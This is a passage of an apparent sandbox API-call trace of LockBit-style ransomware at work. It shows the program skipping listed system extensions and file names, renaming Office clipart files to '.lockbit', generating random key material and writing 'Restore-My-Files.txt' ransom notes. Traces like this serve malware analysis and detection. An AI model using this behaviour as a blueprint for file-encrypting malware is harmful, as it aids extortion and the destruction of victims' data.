(lpString1=".lnk", lpString2=".WMF") returned -1 [0102.188] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0102.188] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0102.188] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN00965_.WMF") returned 1 [0102.188] lstrcmpiW (lpString1="ntldr", lpString2="AN00965_.WMF") returned 1 [0102.188] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN00965_.WMF") returned 1 [0102.188] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN00965_.WMF") returned 1 [0102.188] lstrcmpiW (lpString1="autorun.inf", lpString2="AN00965_.WMF") returned 1 [0102.188] lstrcmpiW (lpString1="thumbs.db", lpString2="AN00965_.WMF") returned 1 [0102.188] lstrcmpiW (lpString1="iconcache.db", lpString2="AN00965_.WMF") returned 1 [0102.188] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0102.188] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned=".WMF" [0102.188] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0102.188] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0102.188] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0102.188] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0102.188] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0102.188] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0102.188] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0102.189] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0102.189] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0102.189] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0102.189] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0102.189] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0102.189] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0102.189] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0102.189] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0102.189] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0102.189] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0102.189] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0102.189] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0102.189] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0102.189] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0102.189] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0102.189] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0102.189] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0102.189] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0102.189] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0102.189] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0102.189] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0102.189] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF.lockbit") returned 72 [0102.189] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00965_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xf00 [0102.190] CreateIoCompletionPort (FileHandle=0xf00, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0102.190] malloc (_Size=0x40068) returned 0x1ff1e60 [0102.190] GetFileSizeEx (in: hFile=0xf00, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7072) returned 1 [0102.190] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.191] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0102.191] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.192] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0102.192] ReadFile (in: hFile=0xf00, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.262] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0102.262] malloc (_Size=0xa6) returned 0x3df0008 [0102.262] NtSetInformationFile (FileHandle=0xf00, IoStatusBlock=0x3d6b6b4, FileInformation=0x3df0008, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0102.264] free (_Block=0x3df0008) [0102.264] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0102.264] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0102.264] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0102.264] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d83ea00, ftCreationTime.dwHighDateTime=0x1bd4b15, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d83ea00, ftLastWriteTime.dwHighDateTime=0x1bd4b15, nFileSizeHigh=0x0, nFileSizeLow=0xd10, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN01039_.WMF", cAlternateFileName="")) returned 1 [0102.264] lstrcmpiW (lpString1=".", lpString2="AN01039_.WMF") returned -1 [0102.264] lstrcmpiW (lpString1="..", lpString2="AN01039_.WMF") returned -1 [0102.264] PathFindExtensionW (pszPath="AN01039_.WMF") returned=".WMF" [0102.264] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0102.264] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0102.264] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0102.264] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0102.264] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0102.265] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0102.265] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0102.266] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0102.266] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0102.266] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0102.266] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.266] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0102.266] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0102.266] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0102.266] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0102.266] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN01039_.WMF") returned 1 [0102.266] lstrcmpiW (lpString1="ntldr", lpString2="AN01039_.WMF") returned 1 [0102.266] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN01039_.WMF") returned 1 [0102.266] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN01039_.WMF") returned 1 [0102.266] lstrcmpiW (lpString1="autorun.inf", lpString2="AN01039_.WMF") returned 1 [0102.266] lstrcmpiW (lpString1="thumbs.db", lpString2="AN01039_.WMF") returned 1 [0102.266] lstrcmpiW (lpString1="iconcache.db", lpString2="AN01039_.WMF") returned 1 [0102.266] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0102.266] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned=".WMF" [0102.266] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0102.266] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0102.266] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0102.266] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0102.266] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0102.266] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0102.266] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0102.266] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0102.266] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0102.266] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0102.266] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0102.266] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0102.266] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0102.267] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0102.267] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0102.267] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0102.267] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0102.267] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0102.267] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0102.267] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0102.267] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0102.267] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0102.267] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0102.267] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0102.267] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0102.267] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0102.267] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0102.267] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0102.267] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF.lockbit") returned 72 [0102.267] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01039_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xf00 [0102.267] CreateIoCompletionPort (FileHandle=0xf00, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0102.267] malloc (_Size=0x40068) returned 0x1ff1e60 [0102.267] GetFileSizeEx (in: hFile=0xf00, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3344) returned 1 [0102.268] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.268] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0102.268] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.268] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0102.269] ReadFile (in: hFile=0xf00, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0102.274] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0102.274] malloc (_Size=0xa6) returned 0x3df0008 [0102.275] NtSetInformationFile (FileHandle=0xf00, IoStatusBlock=0x3d6b6b4, FileInformation=0x3df0008, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0102.275] free (_Block=0x3df0008) [0102.275] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0102.275] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0102.275] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0102.275] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31e92000, ftCreationTime.dwHighDateTime=0x1bd4b15, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x31e92000, ftLastWriteTime.dwHighDateTime=0x1bd4b15, nFileSizeHigh=0x0, nFileSizeLow=0x63c, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN01044_.WMF", cAlternateFileName="")) returned 1 [0102.275] lstrcmpiW (lpString1=".", lpString2="AN01044_.WMF") returned -1 [0102.275] lstrcmpiW (lpString1="..", lpString2="AN01044_.WMF") returned -1 [0102.275] PathFindExtensionW (pszPath="AN01044_.WMF") returned=".WMF" [0102.275] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0102.275] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0102.275] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0102.275] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0102.275] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0102.275] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0102.275] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0102.275] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0102.275] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0102.275] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0102.275] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0102.275] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0102.275] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0102.275] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0102.275] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0102.275] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0102.275] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0102.276] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0102.276] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN01044_.WMF") returned 1 [0102.276] lstrcmpiW (lpString1="ntldr", lpString2="AN01044_.WMF") returned 1 [0102.276] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN01044_.WMF") returned 1 [0102.277] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN01044_.WMF") returned 1 [0102.277] lstrcmpiW (lpString1="autorun.inf", lpString2="AN01044_.WMF") returned 1 [0102.277] lstrcmpiW (lpString1="thumbs.db", lpString2="AN01044_.WMF") returned 1 [0102.277] lstrcmpiW (lpString1="iconcache.db", lpString2="AN01044_.WMF") returned 1 [0102.277] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0102.277] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned=".WMF" [0102.277] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0102.277] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0102.277] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0102.277] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0102.277] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0102.277] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0102.277] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0102.277] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0102.277] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0102.277] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0102.277] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0102.277] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0102.277] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0102.277] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0102.277] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0102.277] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0102.277] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0102.277] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0102.277] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0102.277] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0102.277] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0102.277] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0102.277] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0102.277] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0102.278] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0102.278] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0102.278] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0102.278] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0102.278] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF.lockbit") returned 72 [0102.278] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xf00 [0102.278] CreateIoCompletionPort (FileHandle=0xf00, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0102.278] malloc (_Size=0x40068) returned 0x1ff1e60 [0102.278] GetFileSizeEx (in: hFile=0xf00, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1596) returned 1 [0102.278] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.279] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.279] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0102.279] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.280] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.280] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0102.280] ReadFile (in: hFile=0xf00, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0102.288] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0102.288] malloc (_Size=0xa6) returned 0x3df0008 [0102.288] NtSetInformationFile (FileHandle=0xf00, IoStatusBlock=0x3d6b6b4, FileInformation=0x3df0008, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0102.289] free (_Block=0x3df0008) [0102.289] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0102.289] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0102.289] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, 